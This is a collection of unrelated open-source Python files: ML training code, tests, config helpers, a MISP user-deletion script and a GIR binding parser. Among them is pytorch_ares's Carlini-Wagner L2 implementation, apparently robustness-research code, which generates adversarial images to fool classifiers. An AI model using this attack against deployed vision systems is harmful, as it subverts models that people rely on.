utils.writeNpErrToScreen('roughAccu', np.mean(roughErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccu', np.mean(depthErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('albedoAccu', np.mean(albedoErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('normalAccu', np.mean(normalErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('roughAccu', np.mean(roughErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccu', np.mean(depthErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j% 2000 == 0:
# Save the predicted results
vutils.save_image( ( (albedoPred ) ** (1.0/2.2) ).data,
'{0}/{1}_albedoPred_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(normalPred + 1) ).data,
'{0}/{1}_normalPred_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(roughPred + 1) ).data,
'{0}/{1}_roughPred_{2}.png'.format(opt.experiment, j, 0) )
depthOut = 1 / torch.clamp(depthPred + 1, 1e-6, 10)
vutils.save_image( ( depthOut ).data,
'{0}/{1}_depthPred_{2}.png'.format(opt.experiment, j, 0) )
##############################################################################################################
######################################## Train with NYU dataset ##############################################
##############################################################################################################
# Clear the gradient in optimizer
opEncoder.zero_grad()
opAlbedo.zero_grad()
opNormal.zero_grad()
opRough.zero_grad()
opDepth.zero_grad()
albedoPair, normalPair, roughPair, depthPair \
= wnyu.wrapperNYU(NYUBatch, opt, encoder,
albedoDecoder, normalDecoder, roughDecoder, depthDecoder )
albedoPred = albedoPair[0]
normalPred, normalErr, angleErr = normalPair[0], normalPair[1], normalPair[2]
roughPred = roughPair[0]
depthPred, depthErr = depthPair[0], depthPair[1]
totalErr = normNYUW * normalErr + depthNYUW * depthErr
totalErr.backward()
# Update the network parameter
opEncoder.step()
opAlbedo.step()
opNormal.step()
opRough.step()
opDepth.step()
# Output training error
utils.writeErrToScreen('normalNYU', [normalErr], epoch, j)
utils.writeErrToScreen('angleNYU', [angleErr], epoch, j)
utils.writeErrToScreen('depthNYU', [depthErr], epoch, j)
utils.writeErrToFile('normalNYU', [normalErr], trainingLog, epoch, j)
utils.writeErrToFile('angleNYU', [angleErr], trainingLog, epoch, j)
utils.writeErrToFile('depthNYU', [depthErr], trainingLog, epoch, j)
normalNYUErrsNpList = np.concatenate( [normalNYUErrsNpList, utils.turnErrorIntoNumpy( [normalErr] )], axis=0)
angleNYUErrsNpList = np.concatenate( [angleNYUErrsNpList, utils.turnErrorIntoNumpy( [angleErr] )], axis=0)
depthNYUErrsNpList = np.concatenate( [depthNYUErrsNpList, utils.turnErrorIntoNumpy( [depthErr] )], axis=0)
if j < 1000:
utils.writeNpErrToScreen('normalAccuNYU', np.mean(normalNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('angleAccuNYU', np.mean(angleNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccuNYU', np.mean(depthNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('normalAccuNYU', np.mean(normalNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('angleAccuNYU', np.mean(angleNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccuNYU', np.mean(depthNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('normalAccuNYU', np.mean(normalNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('angleAccuNYU', np.mean(angleNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccuNYU', np.mean(depthNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('normalAccuNYU', np.mean(normalNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('angleAccuNYU', np.mean(angleNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccuNYU', np.mean(depthNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j% 500 == 0:
# Save the predicted results
vutils.save_image( ( (albedoPred ) ** (1.0/2.2) ).data,
'{0}/{1}_albedoPredNYU_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(normalPred + 1) ).data,
'{0}/{1}_normalPredNYU_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(roughPred + 1) ).data,
'{0}/{1}_roughPredNYU_{2}.png'.format(opt.experiment, j, 0) )
depthOut = 1 / torch.clamp(depthPred + 1, 1e-6, 10)
vutils.save_image( ( depthOut ).data,
'{0}/{1}_depthPredNYU_{2}.png'.format(opt.experiment, j, 0) )
if j % 2000 == 0:
# save the models
torch.save(encoder.module, '{0}/encoder{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(albedoDecoder.module, '{0}/albedo{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(normalDecoder.module, '{0}/normal{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(roughDecoder.module, '{0}/rough{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(depthDecoder.module, '{0}/depth{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
######################################################################################################################
trainingLog.close()
# Update the training rate
if (epoch + 1) % 10 == 0:
for param_group in opEncoder.param_groups:
param_group['lr'] /= 2
for param_group in opAlbedo.param_groups:
param_group['lr'] /= 2
for param_group in opNormal.param_groups:
param_group['lr'] /= 2
for param_group in opRough.param_groups:
param_group['lr'] /= 2
for param_group in opDepth.param_groups:
param_group['lr'] /= 2
# Save the error record
np.save('{0}/albedoError_{1}.npy'.format(opt.experiment, epoch), albedoErrsNpList )
np.save('{0}/normalError_{1}.npy'.format(opt.experiment, epoch), normalErrsNpList )
np.save('{0}/roughError_{1}.npy'.format(opt.experiment, epoch), roughErrsNpList )
np.save('{0}/depthError_{1}.npy'.format(opt.experiment, epoch), depthErrsNpList )
np.save('{0}/normalNYUError_{1}.npy'.format(opt.experiment, epoch), normalNYUErrsNpList )
np.save('{0}/angleNYUError_{1}.npy'.format(opt.experiment, epoch), angleNYUErrsNpList )
# save the models
torch.save(encoder.module, '{0}/encoder{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(albedoDecoder.module, '{0}/albedo{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(normalDecoder.module, '{0}/normal{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(roughDecoder.module, '{0}/rough{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(depthDecoder.module, '{0}/depth{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
|
astropy/time/tests/test_pickle.py | jayvdb/astropy | 445 | 12698163 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import pickle
import numpy as np
from astropy.time import Time
class TestPickle:
"""Basic pickle test of time"""
def test_pickle(self):
times = ['1999-01-01 00:00:00.123456789', '2010-01-01 00:00:00']
t1 = Time(times, scale='utc')
for prot in range(pickle.HIGHEST_PROTOCOL):
t1d = pickle.dumps(t1, prot)
t1l = pickle.loads(t1d)
assert np.all(t1l == t1)
t2 = Time('2012-06-30 12:00:00', scale='utc')
for prot in range(pickle.HIGHEST_PROTOCOL):
t2d = pickle.dumps(t2, prot)
t2l = pickle.loads(t2d)
assert t2l == t2
|
runtime/java9_container.py | tobegit3hub/lambda-docker | 343 | 12698184 |
import basic_container
class Java9Container(basic_container.BasicContainer):
def __init__(self):
super(self.__class__, self).__init__()
self.image = "java:9"
self.command = 'sh -c "javac main.java && java main"'
self.file_extension = ".java"
|
tests/configlet/util/helpers.py | lolyu/sonic-mgmt | 132 | 12698186 | #! /usr/bin/env python
from datetime import datetime
import inspect
import logging
logger = logging.getLogger(__name__)
do_print = False
def log_init(name):
global logger
logger = logging.getLogger(name)
def log_msg(lgr_fn, m):
tstr = datetime.now().strftime("%H:%M:%S")
msg = "{}:{}:{} {}".format(inspect.stack()[2][1], inspect.stack()[2][2], tstr, m)
lgr_fn(msg)
if do_print:
print(msg)
def log_error(m):
log_msg(logger.error, m)
def log_info(m):
log_msg(logger.info, m)
def log_warn(m):
log_msg(logger.warning, m)
def log_debug(m):
log_msg(logger.debug, m)
def set_print():
global do_print
do_print = True
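# Typical use (a sketch): a test module calls log_init(__name__) once, optionally
# set_print() to echo messages to stdout, and then log_info()/log_warn()/log_debug();
# log_msg() prefixes every message with the caller's file, line number and an
# HH:MM:SS timestamp via inspect.stack()[2].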
|
src/ralph/reports/urls.py | DoNnMyTh/ralph | 1,668 | 12698197 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from ralph.reports import views
urlpatterns = [
url(
r'^category_model_report/?$',
views.CategoryModelReport.as_view(),
name='category_model_report'
),
url(
r'^category_model__status_report/?$',
views.CategoryModelStatusReport.as_view(),
name='category_model__status_report'
),
url(
r'^manufactured_category_model_report/?$',
views.ManufacturerCategoryModelReport.as_view(),
name='manufactured_category_model_report'
),
url(
r'^status_model_report/?$',
views.StatusModelReport.as_view(),
name='status_model_report'
),
url(
r'^asset_relations/?$',
views.AssetRelationsReport.as_view(),
name='asset-relations'
),
url(
r'^licence_relations/?$',
views.LicenceRelationsReport.as_view(),
name='licence-relations'
),
url(
r'^failures_report/?$',
views.FailureReport.as_view(),
name='failures-report'
),
url(
r'^supports_report/?$',
views.AssetSupportsReport.as_view(),
name='assets-supports'
),
]
|
examples/delete_user.py | chrisinmtown/PyMISP | 307 | 12698244 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import ExpandedPyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Delete the user with the given id. Keep in mind that disabling users (by setting the disabled flag via an edit) is always preferred to keep user associations to events intact.')
parser.add_argument("-i", "--user_id", help="The id of the user you want to delete.")
args = parser.parse_args()
misp = ExpandedPyMISP(misp_url, misp_key, misp_verifycert)
print(misp.delete_user(args.user_id))
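# Example invocation (a sketch): python delete_user.py -i 42
# misp_url, misp_key and misp_verifycert are expected to be defined in a local
# keys.py, as imported above.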
|
pkg/build/lib/vtreat/transform.py | WinVector/pyvtreat | 104 | 12698257 | <filename>pkg/build/lib/vtreat/transform.py<gh_stars>100-1000
"""base class for user transforms"""
class UserTransform:
"""base class for user transforms, should express taking a set of k inputs to k outputs independently"""
def __init__(self, treatment):
self.y_aware_ = True
self.treatment_ = treatment
self.incoming_vars_ = []
self.derived_vars_ = []
# noinspection PyPep8Naming
def fit(self, X, y):
"""
sklearn API
:param X: explanatory values
:param y: dependent values
:return: self for method chaining
"""
raise NotImplementedError("base method called")
# noinspection PyPep8Naming
def transform(self, X):
"""
:param X: explanatory values
:return: transformed data
"""
raise NotImplementedError("base method called")
# noinspection PyPep8Naming
def fit_transform(self, X, y):
"""
:param X: explanatory values
:param y: dependent values
:return: transformed data
"""
self.fit(X, y)
return self.transform(X)
def __repr__(self):
return (
"vtreat.transform.UserTransform("
+ "treatment="
+ self.treatment_.__repr__()
+ ") {"
+ "'y_aware_': "
+ str(self.y_aware_)
+ ", "
+ "'treatment_': "
+ str(self.treatment_)
+ ", "
+ "'incoming_vars_': "
+ str(self.incoming_vars_)
+ "}"
)
def __str__(self):
return self.__repr__()
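# A minimal subclass sketch (illustrative only; the centering logic below is an
# assumption, not something vtreat ships): fit() learns per-column state and
# transform() applies it, keeping the k-inputs -> k-outputs contract.
#
#     class CenteringTransform(UserTransform):
#         def __init__(self):
#             UserTransform.__init__(self, treatment="center")
#         def fit(self, X, y):
#             self.means_ = X.mean()
#             self.incoming_vars_ = list(X.columns)
#             return self
#         def transform(self, X):
#             return X - self.means_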
|
pyquil/_memory.py | stjordanis/pyquil | 677 | 12698293 | <reponame>stjordanis/pyquil<filename>pyquil/_memory.py<gh_stars>100-1000
from dataclasses import dataclass, field
import dataclasses
from typing import Dict, Mapping, Sequence, Union
from rpcq.messages import ParameterAref
ParameterValue = Union[int, float, Sequence[int], Sequence[float]]
@dataclass
class Memory:
"""
Memory encapsulates the values to be sent as parameters alongside a program at time of
execution, and read back afterwards.
"""
values: Dict[ParameterAref, Union[int, float]] = field(default_factory=dict)
def copy(self) -> "Memory":
"""
Return a deep copy of this Memory object.
"""
return Memory(values={dataclasses.replace(k): v for k, v in self.values.items()})
def write(self, parameter_values: Mapping[Union[str, ParameterAref], ParameterValue]) -> "Memory":
"""
Set the given values for the given parameters.
"""
for parameter, parameter_value in parameter_values.items():
self._write_value(parameter=parameter, value=parameter_value)
return self
def _write_value(
self,
*,
parameter: Union[ParameterAref, str],
value: ParameterValue,
) -> "Memory":
"""
Mutate the program to set the given parameter value.
:param parameter: Name of the memory region, or parameter reference with offset.
:param value: the value or values to set for this parameter. If a list
is provided, parameter must be a ``str`` or ``parameter.offset == 0``.
"""
if isinstance(parameter, str):
parameter = ParameterAref(name=parameter, index=0)
import numpy as np
if isinstance(value, (int, float)):
self.values[parameter] = value
elif isinstance(value, (Sequence, np.ndarray)):
if parameter.index != 0:
raise ValueError("Parameter may not have a non-zero index when its value is a sequence")
for index, v in enumerate(value):
if not isinstance(v, (int, float)):
raise TypeError(f"Parameter must be numeric, not {type(value)}")
aref = ParameterAref(name=parameter.name, index=index)
self.values[aref] = v
else:
raise TypeError(f"Parameter must be numeric or an iterable of numeric values, not {type(value)}")
return self
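# Illustrative usage (a sketch, not part of the library's test suite):
#
#     mem = Memory().write({"theta": 0.5, "alphas": [0.1, 0.2]})
#
# stores ParameterAref(name="theta", index=0) -> 0.5 and one
# ParameterAref(name="alphas", index=i) entry per element of the list; these are
# the values sent alongside the program at execution time.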
|
core/src/main/python/akdl/akdl/tests/config/test_config.py | starburst-project/Alink | 3,301 | 12698319 | import unittest
import tensorflow as tf
if tf.__version__ >= '2.0':
tf = tf.compat.v1
from akdl.runner.config import BatchTaskConfig, StreamTaskConfig, TrainTaskConfig
def print_dataset(dataset: tf.data.Dataset):
next_record = dataset.make_one_shot_iterator().get_next()
counter = 0
with tf.Session() as sess:
while True:
try:
record = sess.run(next_record)
example = tf.train.Example.FromString(record)
if counter < 10:
print(example)
counter += 1
except tf.errors.OutOfRangeError:
break
print("total examples: " + str(counter))
def batch_main(args: BatchTaskConfig):
print_dataset(args.dataset)
def stream_main(args: StreamTaskConfig):
print_dataset(args.dataset_fn())
def train_main(args: TrainTaskConfig):
print_dataset(args.dataset)
class TestConfig(unittest.TestCase):
def test_batch_task_config(self):
tfrecords_path = "dataset.tfrecords"
batch_main(BatchTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset=tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
dataset_file=tfrecords_path,
user_params={},
output_writer=None
))
def test_stream_task_config(self):
tfrecords_path = "dataset.tfrecords"
stream_main(StreamTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset_fn=lambda: tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
user_params={},
output_writer=None
))
def test_train_task_config(self):
tfrecords_path = "dataset.tfrecords"
train_main(TrainTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset=tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
dataset_file=tfrecords_path,
user_params={},
saved_model_dir=None
))
|
StackApp/env/lib/python2.7/site-packages/flask_api/tests/test_settings.py | jonathanmusila/StackOverflow-Lite | 555 | 12698324 | # coding: utf8
from __future__ import unicode_literals
from flask_api.settings import APISettings
import unittest
class SettingsTests(unittest.TestCase):
def test_bad_import(self):
settings = APISettings({'DEFAULT_PARSERS': 'foobarz.FailedImport'})
with self.assertRaises(ImportError) as context:
settings.DEFAULT_PARSERS
msg = str(context.exception)
excepted_py2 = (
"Could not import 'foobarz.FailedImport' for API setting "
"'DEFAULT_PARSERS'. No module named foobarz."
)
excepted_py3 = (
"Could not import 'foobarz.FailedImport' for API setting "
"'DEFAULT_PARSERS'. No module named 'foobarz'."
)
self.assertIn(msg, (excepted_py2, excepted_py3))
|
src/towncrier/_project.py | hawkowl/towncrier | 252 | 12698356 | <reponame>hawkowl/towncrier<filename>src/towncrier/_project.py
# Copyright (c) <NAME>, 2015
# See LICENSE for details.
"""
Responsible for getting the version and name from a project.
"""
import sys
from importlib import import_module
from incremental import Version
def _get_package(package_dir, package):
try:
module = import_module(package)
except ImportError:
# Package is not already available / installed.
# Force importing it based on the source files.
sys.path.insert(0, package_dir)
try:
module = import_module(package)
except ImportError as e:
err = f"tried to import {package}, but ran into this error: {e}"
# NOTE: this might be redirected via "towncrier --draft > …".
print(f"ERROR: {err}")
raise
finally:
sys.path.pop(0)
return module
def get_version(package_dir, package):
module = _get_package(package_dir, package)
version = getattr(module, "__version__", None)
if not version:
raise Exception("No __version__, I don't know how else to look")
if isinstance(version, str):
return version.strip()
if isinstance(version, Version):
return version.base().strip()
if isinstance(version, tuple):
return ".".join(map(str, version)).strip()
raise Exception(
"I only know how to look at a __version__ that is a str, "
"an Increment Version, or a tuple. If you can't provide "
"that, use the --version argument and specify one."
)
def get_project_name(package_dir, package):
module = _get_package(package_dir, package)
version = getattr(module, "__version__", None)
if not version:
# welp idk
return package.title()
if isinstance(version, str):
return package.title()
if isinstance(version, Version):
# Incremental has support for package names
return version.package
|
pytorch_ares/pytorch_ares/attack_torch/cw.py | thu-ml/realsafe | 107 | 12698368 | import numpy as np
import torch
from torch.autograd import Variable
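# Illustrative construction (a sketch; the argument values are assumptions, not
# defaults taken from the repo):
#
#     attack = CW(model, device, norm=2, IsTargeted=False, kappa=0, lr=0.2,
#                 init_const=0.01, max_iter=200, binary_search_steps=4,
#                 data_name='cifar10')
#     adv = attack.forward(images, labels)   # untargeted L2 attack
#
# forward() runs a binary search over the constant c, optimising in tanh-space
# with Adam and keeping, per sample, the successful perturbation with the
# smallest L2 distance.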
class CW(object):
def __init__(self, model, device,norm, IsTargeted, kappa, lr, init_const, max_iter, binary_search_steps, data_name):
self.net = model
self.device = device
self.IsTargeted = IsTargeted
self.kappa = kappa #0
self.learning_rate = lr #0.2
self.init_const = init_const #0.01
self.lower_bound = 0.0 #0.0
self.upper_bound = 1.0 #1.0
self.max_iter = max_iter #200
self.norm = norm
self.binary_search_steps = binary_search_steps #4
self.data_name = data_name
if self.data_name=='imagenet':
self.class_type_number=1000
else:
self.class_type_number = 10
if self.data_name=="cifar10" and self.IsTargeted:
            raise AssertionError('cifar10 does not support targeted attack')
if self.norm==np.inf:
            raise AssertionError('current CW implementation does not support Linf')
assert self.norm==2
def atanh(self, x):
return 0.5 * torch.log((1 + x) / (1 - x))
def forward(self, xs=None, ys=None, ytarget=None):
device = self.device
targeted = self.IsTargeted
copy_xs = xs.clone()
copy_ys = ys.clone()
if ytarget is not None:
copy_ytarget = ytarget.clone()
else:
            copy_ytarget = copy_ys  # not actually used in the untargeted case; just a placeholder value
batch_size = xs.shape[0]#10
mid_point = (self.upper_bound + self.lower_bound) * 0.5 #0.5
half_range = (self.upper_bound - self.lower_bound) * 0.5 #0.5
arctanh_xs = self.atanh((copy_xs - mid_point) / half_range * 0.9999) #(10,3,32,32)
# var_xs = Variable(torch.from_numpy(arctanh_xs).to(device), requires_grad=True) #torch.Size([10, 3, 32, 32])
var_xs=arctanh_xs.clone()
var_xs.requires_grad=True
        const_origin = torch.ones(batch_size, device=self.device) * self.init_const  # a tensor filled with the initial constant 0.01
c_upper_bound = [1e10] * batch_size
c_lower_bound = torch.zeros(batch_size, device=self.device)
targets_in_one_hot = []
targeteg_class_in_one_hot = []
temp_one_hot_matrix = torch.eye(int(self.class_type_number), device=self.device)
if targeted:
for i in range(batch_size):
current_target1 = temp_one_hot_matrix[copy_ytarget[i]]
targeteg_class_in_one_hot.append(current_target1)
targeteg_class_in_one_hot = torch.stack(targeteg_class_in_one_hot).clone().type_as(xs).to(self.device) #torch.Size([10, 10])
else:
for i in range(batch_size):
current_target = temp_one_hot_matrix[copy_ys[i]]
targets_in_one_hot.append(current_target)
targets_in_one_hot = torch.stack(targets_in_one_hot).clone().type_as(xs).to(self.device) #torch.Size([10, 10])
best_l2 = [1e10] * batch_size
best_perturbation = torch.zeros(var_xs.size()) #(10, 3, 32, 32)
current_prediction_class = [-1] * batch_size
def attack_achieved(pre_softmax, true_class, target_class):
targeted = self.IsTargeted
if targeted:
pre_softmax[target_class] -= self.kappa
return torch.argmax(pre_softmax).item() == target_class
else:
pre_softmax[true_class] -= self.kappa
return torch.argmax(pre_softmax).item() != true_class
for search_for_c in range(self.binary_search_steps):
modifier = torch.zeros(var_xs.shape).float()
modifier = Variable(modifier.to(device), requires_grad=True)
optimizer = torch.optim.Adam([modifier], lr=self.learning_rate)
var_const = const_origin.clone().to(device)
print("\tbinary search step {}:".format(search_for_c))
for iteration_times in range(self.max_iter):
# inverse the transform tanh -> [0, 1]
perturbed_images = (torch.tanh(var_xs + modifier) * half_range + mid_point)
prediction = self.net(perturbed_images)
l2dist = torch.sum(
(perturbed_images - (torch.tanh(var_xs) * half_range + mid_point))
** 2,
[1, 2, 3],
)
if targeted:
constraint_loss = torch.max((prediction - 1e10 * targeteg_class_in_one_hot).max(1)[0] - (prediction * targeteg_class_in_one_hot).sum(1),
torch.ones(batch_size, device=device) * self.kappa * -1,
)
else:
constraint_loss = torch.max((prediction * targets_in_one_hot).sum(1)
- (prediction - 1e10 * targets_in_one_hot).max(1)[0],
torch.ones(batch_size, device=device) * self.kappa * -1,
)
loss_f = var_const * constraint_loss
loss = l2dist.sum() + loss_f.sum() # minimize |r| + c * loss_f(x+r,l)
optimizer.zero_grad()
loss.backward(retain_graph=True)
optimizer.step()
# update the best l2 distance, current predication class as well as the corresponding adversarial example
# for i, (dist, score, img) in enumerate(
# zip(
# l2dist.data.cpu().numpy(),
# prediction.data.cpu().numpy(),
# perturbed_images.data.cpu().numpy(),
# )
# ):
for i in range(prediction.shape[0]):
dist=l2dist[i]
score=prediction[i]
img=perturbed_images[i]
if dist.item() < best_l2[i] and attack_achieved(score, copy_ys[i], copy_ytarget[i]):
best_l2[i] = dist
current_prediction_class[i] = torch.argmax(score)
best_perturbation[i] = img
# update the best constant c for each sample in the batch
for i in range(batch_size):
if (
current_prediction_class[i] == copy_ys[i].item()
and current_prediction_class[i] != -1
):
c_upper_bound[i] = min(c_upper_bound[i], const_origin[i].item())
if c_upper_bound[i] < 1e10:
const_origin[i] = (c_lower_bound[i].item() + c_upper_bound[i]) / 2.0
else:
c_lower_bound[i] = max(c_lower_bound[i].item(), const_origin[i].item())
if c_upper_bound[i] < 1e10:
                        const_origin[i] = (c_lower_bound[i].item() + c_upper_bound[i]) / 2.0
else:
const_origin[i] *= 10
adv_xs = best_perturbation.to(device)
return adv_xs |
bindings/java/gir_parser.py | george-hopkins/pkg-openwebrtc | 1,604 | 12698386 | # Copyright (c) 2014-2015, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
from __future__ import print_function
import xml.etree.ElementTree as ET
import itertools
from standard_types import VoidType, IntType, LongPtrType, GParamSpecType, JObjectWrapperType
from standard_types import ClassCallbackMetaType, GObjectMetaType, CallbackMetaType
from standard_types import EnumMetaType, BitfieldMetaType, GWeakRefType, JDestroyType
from copy import copy
NS = '{http://www.gtk.org/introspection/core/1.0}'
C_NS = '{http://www.gtk.org/introspection/c/1.0}'
GLIB_NS = '{http://www.gtk.org/introspection/glib/1.0}'
TAG_CLASS = NS + 'class'
TAG_NAMESPACE = NS + 'namespace'
TAG_INCLUDE = NS + 'include'
TAG_CONSTRUCTOR = NS + 'constructor'
TAG_RETURN_VALUE = NS + 'return-value'
TAG_TYPE = NS + 'type'
TAG_ARRAY = NS + 'array'
TAG_PARAMETERS = NS + 'parameters'
TAG_VIRTUAL_METHOD = NS + 'virtual-method'
TAG_PARAMETER = NS + 'parameter'
TAG_PROPERTY = NS + 'property'
TAG_RECORD = NS + 'record'
TAG_FIELD = NS + 'field'
TAG_ENUMERATION = NS + 'enumeration'
TAG_MEMBER = NS + 'member'
TAG_DOC = NS + 'doc'
TAG_CALLBACK = NS + 'callback'
TAG_INSTANCE_PARAMETER = NS + 'instance-parameter'
TAG_METHOD = NS + 'method'
TAG_BITFIELD = NS + 'bitfield'
TAG_FUNCTION = NS + 'function'
TAG_SIGNAL = GLIB_NS + 'signal'
TAG_INTERFACE = NS + 'interface'
TAG_IMPLEMENTS = NS + 'implements'
ATTR_NAME = 'name'
ATTR_WHEN = 'when'
ATTR_VALUE = 'value'
ATTR_SCOPE = 'scope'
ATTR_LENGTH = 'length'
ATTR_PARENT = 'parent'
ATTR_CLOSURE = 'closure'
ATTR_DESTORY = 'destroy'
ATTR_READABLE = 'readable'
ATTR_WRITABLE = 'writable'
ATTR_ALLOW_NONE = 'allow-none'
ATTR_INTROSPECTABLE = 'introspectable'
ATTR_CONSTRUCT_ONLY = 'construct-only'
ATTR_SHARED_LIBRARY = 'shared-library'
ATTR_ZERO_TERMINATED = 'zero-terminated'
ATTR_TRANSFER_ONWERSHIP = 'transfer-ownership'
ATTR_C_IDENTIFIER_PREFIXES = C_NS + 'identifier-prefixes'
ATTR_C_IDENTIFIER = C_NS + 'identifier'
ATTR_C_SYMBOL_PREFIXES = C_NS + 'symbol-prefixes'
ATTR_C_SYMBOL_PREFIX = C_NS + 'symbol-prefix'
ATTR_C_TYPE = C_NS + 'type'
ATTR_GLIB_NICK = GLIB_NS + 'nick'
ATTR_GLIB_TYPE_NAME = GLIB_NS + 'type-name'
ATTR_GLIB_GET_TYPE = GLIB_NS + 'get-type'
ATTR_GLIB_TYPE_STRUCT = GLIB_NS + 'type-struct'
def printable(cls):
cls.__repr__ = lambda self: str(self.__dict__)
return cls
def partition(pred, iterable):
t1, t2 = itertools.tee(iterable)
return filter(pred, t1), filter(lambda x: not pred(x), t2)
def by_name(elements):
return {e.name: e for e in elements}
def title_case(st):
return ''.join(c for c in st.title() if c.isalpha())
def parse_doc(tag):
text = tag.findtext(TAG_DOC)
if text:
text = text.replace('\n', ' ')
return text
def camel_case(st):
st = title_case(st)
return st[0].lower() + st[1:]
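# For example (behaviour of the two helpers above): title_case("local-media-source")
# returns "LocalMediaSource", while camel_case("local-media-source") returns
# "localMediaSource".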
def parse_tag_value(type_registry, tag, name=None):
def lookup_type(tag):
if tag.tag == TAG_ARRAY:
inner_tag = tag.find(TAG_TYPE)
gir_type = inner_tag.get(ATTR_NAME)
c_type = inner_tag.get(ATTR_C_TYPE)
return type_registry.lookup(gir_type, c_type, is_array=True)
else:
gir_type = tag.get(ATTR_NAME)
c_type = tag.get(ATTR_C_TYPE)
return type_registry.lookup(gir_type, c_type)
transfer = tag.get(ATTR_TRANSFER_ONWERSHIP)
type_tag = tag.find(TAG_TYPE)
if type_tag is None:
type_tag = tag.find(TAG_ARRAY)
scope = tag.get(ATTR_SCOPE)
allow_none = tag.get(ATTR_ALLOW_NONE) == '1'
inner_type_tags = type_tag.findall(TAG_TYPE)
if name is None:
name = tag.get(ATTR_NAME)
assert name
typ = lookup_type(type_tag)
value = None
if typ.is_container:
assert inner_type_tags
types = enumerate(map(lookup_type, inner_type_tags))
type_params = [c(name + '_' + str(i), transfer == 'full') for i, c in types]
value = typ(name, transfer != 'none', allow_none, *type_params)
else:
assert transfer != 'container'
if typ.is_array:
c_array_type = type_tag.get(ATTR_C_TYPE)
value = typ(name, transfer == 'full', allow_none, c_array_type)
else:
if scope is not None:
value = typ(name, transfer == 'full', allow_none, scope)
else:
value = typ(name, transfer == 'full', allow_none)
value.doc = parse_doc(tag)
return value
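# The value returned above wraps the type looked up in the registry together
# with its transfer-ownership setting (full vs none), allow-none flag, the
# callback scope when one is declared, and the parsed <doc> text for the tag.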
@printable
class Parameters(object):
def __init__(self, return_value, instance_param, params=None, java_params=None):
params = params or []
